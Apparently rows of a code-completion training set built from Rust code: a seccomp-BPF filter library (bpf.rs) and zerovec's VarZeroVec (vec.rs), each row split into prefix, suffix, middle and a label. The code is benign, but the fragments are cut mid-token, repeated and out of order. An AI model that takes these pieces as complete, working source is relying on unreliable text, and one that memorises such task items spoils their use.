/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
pub const DENY: sock_filter = BPF
|
is_empty
|
identifier_name
|
bpf.rs
|
32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn is_empty(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS {
return Err(Errno::EINVAL);
}
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter)
|
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 8],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
pub const DENY: sock_filter = B
|
{
filter.push(self)
}
|
identifier_body
|
bpf.rs
|
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn is_empty(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS {
return Err(Errno::EINVAL);
}
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter) {
filter.push(self)
}
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 8],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
|
const __AUDIT_ARCH_64BIT: u32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
|
random_line_split
|
|
vec.rs
|
borrowed VarZeroVec, requiring no allocations.
///
/// If a mutating operation is invoked on VarZeroVec, the Borrowed is converted to Owned.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let bytes = &[
/// 4, 0, 0, 0, 0, 0, 1, 0, 3, 0, 6, 0, 119, 207, 137, 230, 150, 135, 240,
/// 145, 132, 131,
/// ];
///
/// let vzv: VarZeroVec<str> = VarZeroVec::parse_byte_slice(bytes).unwrap();
/// assert!(matches!(vzv, VarZeroVec::Borrowed(_)));
/// ```
Borrowed(&'a VarZeroSlice<T, F>),
}
impl<'a, T: ?Sized, F> Clone for VarZeroVec<'a, T, F> {
fn clone(&self) -> Self {
match *self {
VarZeroVec::Owned(ref o) => o.clone().into(),
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> fmt::Debug for VarZeroVec<'_, T, F>
where
T: fmt::Debug,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
VarZeroSlice::fmt(self, f)
}
}
impl<'a, T: ?Sized, F> From<VarZeroVecOwned<T, F>> for VarZeroVec<'a, T, F> {
#[inline]
fn from(other: VarZeroVecOwned<T, F>) -> Self {
VarZeroVec::Owned(other)
}
}
impl<'a, T: ?Sized, F> From<&'a VarZeroSlice<T, F>> for VarZeroVec<'a, T, F> {
fn from(other: &'a VarZeroSlice<T, F>) -> Self {
VarZeroVec::Borrowed(other)
}
}
impl<'a, T: ?Sized + VarULE, F: VarZeroVecFormat> From<VarZeroVec<'a, T, F>>
for VarZeroVecOwned<T, F>
{
#[inline]
fn from(other: VarZeroVec<'a, T, F>) -> Self {
match other {
VarZeroVec::Owned(o) => o,
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized> Default for VarZeroVec<'_, T> {
#[inline]
fn default() -> Self {
Self::new()
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> Deref for VarZeroVec<'_, T, F> {
type Target = VarZeroSlice<T, F>;
fn deref(&self) -> &VarZeroSlice<T, F> {
self.as_slice()
}
}
impl<'a, T: VarULE + ?Sized, F: VarZeroVecFormat> VarZeroVec<'a, T, F> {
/// Creates a new, empty `VarZeroVec<T>`.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let vzv: VarZeroVec<str> = VarZeroVec::new();
/// assert!(vzv.is_empty());
/// ```
#[inline]
pub const fn new() -> Self {
Self::Borrowed(VarZeroSlice::new_empty())
}
/// Parse a VarZeroVec from a slice of the appropriate format
///
/// Slices of the right format can be obtained via [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "baz");
/// assert_eq!(&vec[3], "quux");
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn parse_byte_slice(slice: &'a [u8]) -> Result<Self, ZeroVecError> {
let borrowed = VarZeroSlice::<T, F>::parse_byte_slice(slice)?;
Ok(VarZeroVec::Borrowed(borrowed))
}
/// Uses a `&[u8]` buffer as a `VarZeroVec<T>` without any verification.
///
/// # Safety
///
/// `bytes` need to be an output from [`VarZeroSlice::as_bytes()`].
pub const unsafe fn from_bytes_unchecked(bytes: &'a [u8]) -> Self {
Self::Borrowed(core::mem::transmute(bytes))
}
/// Convert this into a mutable vector of the owned `T` type, cloning if necessary.
///
///
/// # Example
///
/// ```rust,ignore
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let mut vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(vec.len(), 4);
/// let mutvec = vec.make_mut();
/// mutvec.push("lorem ipsum".into());
/// mutvec[2] = "dolor sit".into();
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "dolor sit");
/// assert_eq!(&vec[3], "quux");
/// assert_eq!(&vec[4], "lorem ipsum");
/// # Ok::<(), ZeroVecError>(())
/// ```
//
// This function is crate-public for now since we don't yet want to stabilize
// the internal implementation details
pub fn make_mut(&mut self) -> &mut VarZeroVecOwned<T, F> {
match self {
VarZeroVec::Owned(ref mut vec) => vec,
VarZeroVec::Borrowed(slice) => {
let new_self = VarZeroVecOwned::from_slice(slice);
*self = new_self.into();
// recursion is limited since we are guaranteed to hit the Owned branch
self.make_mut()
}
}
}
/// Converts a borrowed ZeroVec to an owned ZeroVec. No-op if already owned.
///
/// # Example
///
/// ```
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(vec.len(), 4);
/// // has 'static lifetime
/// let owned = vec.into_owned();
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn into_owned(mut self) -> VarZeroVec<'static, T, F> {
self.make_mut();
match self {
VarZeroVec::Owned(vec) => vec.into(),
_ => unreachable!(),
}
}
/// Obtain this `VarZeroVec` as a [`VarZeroSlice`]
pub fn as_slice(&self) -> &VarZeroSlice<T, F> {
match *self {
VarZeroVec::Owned(ref owned) => owned,
VarZeroVec::Borrowed(b) => b,
}
}
/// Takes the byte vector representing the encoded data of this VarZeroVec. If borrowed,
/// this function allocates a byte vector and copies the borrowed bytes into it.
///
/// The bytes can be passed back to [`Self::parse_byte_slice()`].
///
/// To get a reference to the bytes without moving, see [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz"];
/// let bytes = VarZeroVec::<str>::from(&strings).into_bytes();
///
/// let mut borrowed: VarZeroVec<str> = VarZeroVec::parse_byte_slice(&bytes)?;
/// assert_eq!(borrowed, &*strings);
///
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn into_byt
|
es(self) -
|
identifier_name
|
|
vec.rs
|
"文", "𑄃"];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// strings: VarZeroVec<'a, str>,
/// }
///
/// let data = Data {
/// strings: VarZeroVec::from(&strings),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// // Will deserialize without allocations
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.strings.get(2), Some("文"));
/// assert_eq!(deserialized.strings, &*strings);
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// Here's another example with `ZeroSlice<T>` (similar to `[T]`):
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// use zerovec::ule::*;
/// use zerovec::VarZeroVec;
/// use zerovec::ZeroSlice;
/// use zerovec::ZeroVec;
///
/// // The structured list correspond to the list of integers.
/// let numbers: &[&[u32]] = &[
/// &[12, 25, 38],
/// &[39179, 100],
/// &[42, 55555],
/// &[12345, 54321, 9],
/// ];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// vecs: VarZeroVec<'a, ZeroSlice<u32>>,
/// }
///
/// let data = Data {
/// vecs: VarZeroVec::from(numbers),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.vecs[0].get(1).unwrap(), 25);
/// assert_eq!(deserialized.vecs[1], *numbers[1]);
///
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// [`VarZeroVec`]s can be nested infinitely via a similar mechanism, see the docs of [`VarZeroSlice`]
/// for more information.
///
/// # How it Works
///
/// `VarZeroVec<T>`, when used with non-human-readable serializers (like `bincode`), will
/// serialize to a specially formatted list of bytes. The format is:
///
/// - 4 bytes for `length` (interpreted as a little-endian u32)
/// - `4 * length` bytes of `indices` (interpreted as little-endian u32)
/// - Remaining bytes for actual `data`
///
/// Each element in the `indices` array points to the starting index of its corresponding
/// data part in the `data` list. The ending index can be calculated from the starting index
/// of the next element (or the length of the slice if dealing with the last element).
///
/// See [the design doc](https://github.com/unicode-org/icu4x/blob/main/utils/zerovec/design_doc.md) for more details.
///
/// [`ule`]: crate::ule
#[non_exhaustive]
pub enum VarZeroVec<'a, T: ?Sized, F = Index16> {
/// An allocated VarZeroVec, allowing for mutations.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let mut vzv = VarZeroVec::<str>::default();
/// vzv.make_mut().push("foo");
/// vzv.make_mut().push("bar");
/// assert!(matches!(vzv, VarZeroVec::Owned(_)));
/// ```
Owned(VarZeroVecOwned<T, F>),
/// A borrowed VarZeroVec, requiring no allocations.
///
/// If a mutating operation is invoked on VarZeroVec, the Borrowed is converted to Owned.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let bytes = &[
/// 4, 0, 0, 0, 0, 0, 1, 0, 3, 0, 6, 0, 119, 207, 137, 230, 150, 135, 240,
/// 145, 132, 131,
/// ];
///
/// let vzv: VarZeroVec<str> = VarZeroVec::parse_byte_slice(bytes).unwrap();
/// assert!(matches!(vzv, VarZeroVec::Borrowed(_)));
/// ```
Borrowed(&'a VarZeroSlice<T, F>),
}
impl<'a, T: ?Sized, F> Clone for VarZeroVec<'a, T, F> {
fn clone(&self) -> Self {
match *self {
VarZeroVec::Owned(ref o) => o.clone().into(),
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> fmt::Debug for VarZeroVec<'_, T, F>
where
T: fmt::Debug,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
|
<'a, T: ?Sized, F> From<VarZeroVecOwned<T, F>> for VarZeroVec<'a, T, F> {
#[inline]
fn from(other: VarZeroVecOwned<T, F>) -> Self {
VarZeroVec::Owned(other)
}
}
impl<'a, T: ?Sized, F> From<&'a VarZeroSlice<T, F>> for VarZeroVec<'a, T, F> {
fn from(other: &'a VarZeroSlice<T, F>) -> Self {
VarZeroVec::Borrowed(other)
}
}
impl<'a, T: ?Sized + VarULE, F: VarZeroVecFormat> From<VarZeroVec<'a, T, F>>
for VarZeroVecOwned<T, F>
{
#[inline]
fn from(other: VarZeroVec<'a, T, F>) -> Self {
match other {
VarZeroVec::Owned(o) => o,
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized> Default for VarZeroVec<'_, T> {
#[inline]
fn default() -> Self {
Self::new()
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> Deref for VarZeroVec<'_, T, F> {
type Target = VarZeroSlice<T, F>;
fn deref(&self) -> &VarZeroSlice<T, F> {
self.as_slice()
}
}
impl<'a, T: VarULE + ?Sized, F: VarZeroVecFormat> VarZeroVec<'a, T, F> {
/// Creates a new, empty `VarZeroVec<T>`.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let vzv: VarZeroVec<str> = VarZeroVec::new();
/// assert!(vzv.is_empty());
/// ```
#[inline]
pub const fn new() -> Self {
Self::Borrowed(VarZeroSlice::new_empty())
}
/// Parse a VarZeroVec from a slice of the appropriate format
///
/// Slices of the right format can be obtained via [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "baz");
/// assert_eq!(&vec[3], "quux");
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn parse_byte_slice(slice: &'a [u8]) -> Result<Self, ZeroVecError> {
let borrowed = VarZeroSlice::<T, F>::parse_byte_slice(slice)?;
Ok(VarZeroVec::Borrowed(borrowed))
}
/// Uses a `&[u8]` buffer as a `VarZeroVec<T>` without any verification.
///
/// # Safety
///
/// `bytes` need to be an output from [`VarZeroSlice::as_bytes()`].
pub const unsafe fn from_bytes_unchecked(bytes: &'a [u8]) -> Self {
Self::Borrowed(core::
|
VarZeroSlice::fmt(self, f)
}
}
impl
|
identifier_body
|
vec.rs
|
"文", "𑄃"];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// strings: VarZeroVec<'a, str>,
/// }
///
/// let data = Data {
/// strings: VarZeroVec::from(&strings),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// // Will deserialize without allocations
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.strings.get(2), Some("文"));
/// assert_eq!(deserialized.strings, &*strings);
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// Here's another example with `ZeroSlice<T>` (similar to `[T]`):
///
/// ```rust
|
/// # use zerovec::ule::ZeroVecError;
/// use zerovec::ule::*;
/// use zerovec::VarZeroVec;
/// use zerovec::ZeroSlice;
/// use zerovec::ZeroVec;
///
/// // The structured list correspond to the list of integers.
/// let numbers: &[&[u32]] = &[
/// &[12, 25, 38],
/// &[39179, 100],
/// &[42, 55555],
/// &[12345, 54321, 9],
/// ];
///
/// #[derive(serde::Serialize, serde::Deserialize)]
/// struct Data<'a> {
/// #[serde(borrow)]
/// vecs: VarZeroVec<'a, ZeroSlice<u32>>,
/// }
///
/// let data = Data {
/// vecs: VarZeroVec::from(numbers),
/// };
///
/// let bincode_bytes =
/// bincode::serialize(&data).expect("Serialization should be successful");
///
/// let deserialized: Data = bincode::deserialize(&bincode_bytes)
/// .expect("Deserialization should be successful");
///
/// assert_eq!(deserialized.vecs[0].get(1).unwrap(), 25);
/// assert_eq!(deserialized.vecs[1], *numbers[1]);
///
/// # Ok::<(), ZeroVecError>(())
/// ```
///
/// [`VarZeroVec`]s can be nested infinitely via a similar mechanism, see the docs of [`VarZeroSlice`]
/// for more information.
///
/// # How it Works
///
/// `VarZeroVec<T>`, when used with non-human-readable serializers (like `bincode`), will
/// serialize to a specially formatted list of bytes. The format is:
///
/// - 4 bytes for `length` (interpreted as a little-endian u32)
/// - `4 * length` bytes of `indices` (interpreted as little-endian u32)
/// - Remaining bytes for actual `data`
///
/// Each element in the `indices` array points to the starting index of its corresponding
/// data part in the `data` list. The ending index can be calculated from the starting index
/// of the next element (or the length of the slice if dealing with the last element).
///
/// See [the design doc](https://github.com/unicode-org/icu4x/blob/main/utils/zerovec/design_doc.md) for more details.
///
/// [`ule`]: crate::ule
#[non_exhaustive]
pub enum VarZeroVec<'a, T: ?Sized, F = Index16> {
/// An allocated VarZeroVec, allowing for mutations.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let mut vzv = VarZeroVec::<str>::default();
/// vzv.make_mut().push("foo");
/// vzv.make_mut().push("bar");
/// assert!(matches!(vzv, VarZeroVec::Owned(_)));
/// ```
Owned(VarZeroVecOwned<T, F>),
/// A borrowed VarZeroVec, requiring no allocations.
///
/// If a mutating operation is invoked on VarZeroVec, the Borrowed is converted to Owned.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let bytes = &[
/// 4, 0, 0, 0, 0, 0, 1, 0, 3, 0, 6, 0, 119, 207, 137, 230, 150, 135, 240,
/// 145, 132, 131,
/// ];
///
/// let vzv: VarZeroVec<str> = VarZeroVec::parse_byte_slice(bytes).unwrap();
